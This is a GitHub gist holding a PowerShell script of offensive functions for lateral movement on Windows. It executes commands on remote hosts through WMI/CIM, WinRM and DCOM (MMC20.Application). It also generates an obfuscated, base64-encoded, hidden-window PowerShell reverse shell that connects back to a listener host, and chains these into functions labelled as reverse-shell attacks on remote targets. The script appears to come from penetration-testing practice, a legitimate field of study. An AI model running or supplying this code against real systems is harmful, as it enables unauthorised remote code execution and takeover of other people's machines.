Skip to content

Instantly share code, notes, and snippets.

@nuvious

nuvious/PowershellRemoteCommand.ps1

Last active May 11, 2025 00:35
Show Gist options
  • Save nuvious/dd5428947bb715caf59b67a215953817 to your computer and use it in GitHub Desktop.
Save nuvious/dd5428947bb715caf59b67a215953817 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
PowershellRemoteCommand.ps1
<#
.SYNOPSIS
Executes a command remotely on a Windows machine using CIM/WMI.
.PARAMETER Username
The username for remote authentication.
.PARAMETER Password
The password associated with the username.
.PARAMETER Command
The command to be executed on the remote machine (e.g., "calc", "notepad", etc.).
Defaults to whoami.
.PARAMETER TargetComputer
The target computer's name or IP address
.EXAMPLE
Invoke-RemoteCommandWMI -Username 'admin' -Password 'Password123' -Command 'notepad' -TargetComputer '10.0.0.5'
.NOTES
Author: David Cheeseman
Created: 2025-05-10
#>
function Invoke-RemoteCommandWMI {
param (
[Parameter(Mandatory=$true)]
[string]$Username,
[Parameter(Mandatory=$true)]
[string]$Password,
[Parameter(Mandatory=$false)]
[string]$Command = 'whoami',
[Parameter(Mandatory=$true)]
[string]$TargetComputer
)
$secureString = ConvertTo-SecureString $Password -AsPlainText -Force;
$credential = New-Object System.Management.Automation.PSCredential ($Username, $secureString);
$options = New-CimSessionOption -Protocol DCOM;
$session = New-CimSession -ComputerName $TargetComputer -Credential $credential -SessionOption $options;
$result = Invoke-CimMethod -CimSession $session -ClassName Win32_Process -MethodName Create -Arguments @{ CommandLine = $Command };
return $result;
}
<#
.SYNOPSIS
Executes a command remotely on a Windows Remote Management functionality.
.PARAMETER Username
The username for remote authentication.
.PARAMETER Password
The password associated with the username.
.PARAMETER Command
The command to be executed on the remote machine (e.g., "calc", "notepad", etc.).
Defaults to whoami.
.PARAMETER TargetComputer
The target computer's name or IP address
.EXAMPLE
Invoke-RemoteCommandWinRM -Username 'admin' -Password 'Password123' -Command 'notepad' -TargetComputer '10.0.0.5'
.NOTES
Author: David Cheeseman
Created: 2025-05-10
#>
function Invoke-RemoteCommandWinRM {
param (
[Parameter(Mandatory=$true)]
[string]$Username,
[Parameter(Mandatory=$true)]
[string]$Password,
[Parameter(Mandatory=$false)]
[string]$Command = 'whoami',
[Parameter(Mandatory=$true)]
[string]$TargetComputer
)
winrs -r:files04 -u:$Username -p:$Password $Command
}
<#
.SYNOPSIS
Opens a remote shell on the target machine.
.PARAMETER Username
The username for remote authentication.
.PARAMETER Password
The password associated with the username.
.PARAMETER TargetComputerName
The target computer's hostname or IP
.EXAMPLE
Invoke-WinRMShell -Username 'admin' -Password 'Password123' -TargetComputerName fileserv
.NOTES
NOTE: Not working at the moment but seems correct per documentation.
Author: David Cheeseman
Created: 2025-05-10
#>
function Invoke-WinRMShell {
param (
[Parameter(Mandatory=$true)]
[string]$Username,
[Parameter(Mandatory=$true)]
[string]$Password,
[Parameter(Mandatory=$false)]
[string]$Command = 'whoami',
[Parameter(Mandatory=$true)]
[string]$TargetComputerName
)
$secureString = ConvertTo-SecureString $Password -AsPlainText -Force;
$credential = New-Object System.Management.Automation.PSCredential ($Username, $secureString);
$pssession = New-PSSession -UseSSL -ComputerName $TargetComputerName -Credential $credential
Enter-PSSession $pssession.Id
}
<#
.SYNOPSIS
Generates a powershell reverse shell command string.
.PARAMETER RshellHost
The host running the reverse shell tcp listener.
.PARAMETER RshellPort
The reverse shell port for the listener.
.EXAMPLE
Get-ReverseShellCMD -RshellHost 192.0.2.42 -RshellPort 443
.NOTES
Author: David Cheeseman
Created: 2025-05-10
#>
function Get-ReverseShellCMD {
param (
[Parameter(Mandatory=$true)]
[string]$RshellHost,
[Parameter(Mandatory=$true)]
[int]$RshellPort
)
$payload = '$client = New-Object System.Net.Sockets.TCPClient("' +
$RshellHost + '",' + $RshellPort + ');' +
'$stream = $client.GetStream();' +
'[byte[]]$bytes = 0..65535|%{0};' +
'while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){' +
'$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);' +
'$sendback = (iex $data 2>&1 | Out-String );' +
'$sendback2 = $sendback + "PS " + (pwd).Path + "> ";' +
'$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);' +
'$stream.Write($sendbyte,0,$sendbyte.Length);' +
'$stream.Flush()};' +
'$client.Close()'
$bytes = [System.Text.Encoding]::Unicode.GetBytes($payload)
$encoded = [Convert]::ToBase64String($bytes)
$cmd = "powershell -nop -w hidden -e $encoded"
return $cmd
}
<#
.SYNOPSIS
Launches a reverse shell attack against a remote host.
.PARAMETER Username
The username for remote authentication.
.PARAMETER Password
The password associated with the username.
.PARAMETER Command
The command to be executed on the remote machine (e.g., "calc", "notepad", etc.).
Defaults to whoami.
.PARAMETER TargetComputer
The target computer's name or IP address
.PARAMETER RshellHost
The host running the reverse shell tcp listener.
.PARAMETER RshellPort
The reverse shell port for the listener.
.EXAMPLE
Invoke-RemoteShell -RshellHost '192.0.2.42' -RshellPort 443 -Username 'admin' -Password 'Password123' -Command 'notepad' -TargetComputer '10.0.0.5'
.NOTES
Author: David Cheeseman
Created: 2025-05-10
#>
function Invoke-RemoteShellWMI {
param (
[Parameter(Mandatory=$true)]
[string]$Username,
[Parameter(Mandatory=$true)]
[string]$Password,
[Parameter(Mandatory=$true)]
[string]$TargetComputer,
[Parameter(Mandatory=$true)]
[string]$RshellHost,
[Parameter(Mandatory=$true)]
[int]$RshellPort
)
$cmd = Get-ReverseShellCMD -RshellHost $RshellHost -RshellPort $RshellPort
Invoke-RemoteCommandWMI -Username $Username -Password $Password -Command $cmd -TargetComputer $TargetComputer
return $result;
}
<#
.SYNOPSIS
Launches a reverse shell attack against a remote host.
.PARAMETER Username
The username for remote authentication.
.PARAMETER Password
The password associated with the username.
.PARAMETER Command
The command to be executed on the remote machine (e.g., "calc", "notepad", etc.).
Defaults to whoami.
.PARAMETER TargetComputer
The target computer's name or IP address
.PARAMETER RshellHost
The host running the reverse shell tcp listener.
.PARAMETER RshellPort
The reverse shell port for the listener.
.EXAMPLE
Invoke-RemoteShell -RshellHost '192.0.2.42' -RshellPort 443 -Username 'admin' -Password 'Password123' -Command 'notepad' -TargetComputer '10.0.0.5'
.NOTES
Author: David Cheeseman
Created: 2025-05-10
#>
function Invoke-RemoteShellWinRM {
param (
[Parameter(Mandatory=$true)]
[string]$Username,
[Parameter(Mandatory=$true)]
[string]$Password,
[Parameter(Mandatory=$true)]
[string]$TargetComputer,
[Parameter(Mandatory=$true)]
[string]$RshellHost,
[Parameter(Mandatory=$true)]
[int]$RshellPort
)
$cmd = Get-ReverseShellCMD -RshellHost $RshellHost -RshellPort $RshellPort
Invoke-RemoteCommandWinRM -Username $Username -Password $Password -TargetComputer $TargetComputer -Command $cmd
return $result;
}
<#
.SYNOPSIS
Executes a command remotely using DCOM functionality.
.PARAMETER Command
The command to be executed on the remote machine (e.g., "calc", "notepad", etc.).
Defaults to whoami.
.PARAMETER TargetComputer
The target computer's name or IP address
.EXAMPLE
Invoke-RemoteCommandWinRM -Username 'admin' -Password 'Password123' -Command 'notepad' -TargetComputer '10.0.0.5'
.NOTES
Author: David Cheeseman
Created: 2025-05-10
#>
function Invoke-RemoteCommandDCOM {
param (
[Parameter(Mandatory=$false)]
[string]$Command = 'whoami',
[Parameter(Mandatory=$true)]
[string]$TargetComputer
)
$dcom = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1",$TargetComputer))
$dcom.Document.ActiveView.ExecuteShellCommand("powershell",$null,$Command,"7")
}
<#
.SYNOPSIS
Launches a reverse shell attack against a remote host.
.PARAMETER Command
The command to be executed on the remote machine (e.g., "calc", "notepad", etc.).
Defaults to whoami.
.PARAMETER TargetComputer
The target computer's name or IP address
.PARAMETER RshellHost
The host running the reverse shell tcp listener.
.PARAMETER RshellPort
The reverse shell port for the listener.
.EXAMPLE
Invoke-RemoteShell -RshellHost '192.0.2.42' -RshellPort 443 -Username 'admin' -Password 'Password123' -Command 'notepad' -TargetComputer '10.0.0.5'
.NOTES
Author: David Cheeseman
Created: 2025-05-10
#>
function Invoke-RemoteShellDCOM {
param (
[Parameter(Mandatory=$true)]
[string]$TargetComputer,
[Parameter(Mandatory=$true)]
[string]$RshellHost,
[Parameter(Mandatory=$true)]
[int]$RshellPort
)
$cmd = Get-ReverseShellCMD -RshellHost $RshellHost -RshellPort $RshellPort
Invoke-RemoteCommandDCOM -TargetComputer $TargetComputer -Command $cmd
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment